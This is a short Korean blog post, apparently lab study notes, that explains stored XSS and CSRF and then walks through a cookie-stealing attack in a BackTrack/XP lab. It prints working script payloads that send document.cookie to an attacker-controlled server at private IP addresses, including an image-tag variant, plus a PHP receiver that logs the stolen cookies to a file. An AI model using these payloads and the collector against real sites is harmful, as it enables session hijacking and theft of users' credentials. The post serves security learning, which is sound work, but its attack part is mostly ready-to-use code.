XSS(Cross site scripting) 
스토어드방식 : 공격자가 서버에 악의적은 스크립트를 하나 심어 놓는다.클라이언트가 우연히 악의적인 스크립트가 담긴 페이지를 리퀘스트 한다.서버는 악의적은 스크립트를 클라이언트에게 전송한다.클라이언트는 웹브라우저를 실행하는 과정에서 악의적인 스크립트가 실행이 된다.
    
CSRF: XSS와 비슷하나 공격대상이 서버가 된다.


공격자가 만들어 놓은 서버도 있다고 가정
공격자가 악의적인 스크립트를 서버에 남기고 클라이언트가 해당서버에 접근 리퀘스트 받음
클라이언트가 공격자에게 쿠키정보를 보내게 만듦
 
스크립트 태그 내에서 DOM으로 접근

<script>
alert(document.cookie);
</script>


<script>
document.location="http://192.168.24.129/param.php?id="+ document.cookie;
</script>


xp에서 보낸 파라미터를 받아 BackTrack서버로 쿠키값을 전송받고 파일로 출력하는 소스
 
<?PHP
$fh = fopen("/tmp/cookie.dat","a");
fputs($fh,"id = " . $_GET['id'] . "\n");
fclose($fh);
?>

파라미터를 입력받을 php코드 작성


쿠키값 확인



이미지 태그를 이용한 XSS
<img name="i">
<script>
document.i.src="http://192.168.24.131/param.php?id="+ document.cookie;
</script>

공격 코드 작성

 

게시물 클릭
쿠키값 확인
 

'정보보안 > Web' 카테고리의 다른 글

CSRF(Cross-site request forgery)공격  (0) 2020.07.15
XSS 공격 우회 및 방어  (0) 2020.07.15
Paros설치 및 세션하이재킹  (0) 2020.07.15
WEB proxy 및 쿠키와 세션  (0) 2020.07.15
WEB 개요  (0) 2020.07.15

+ Recent posts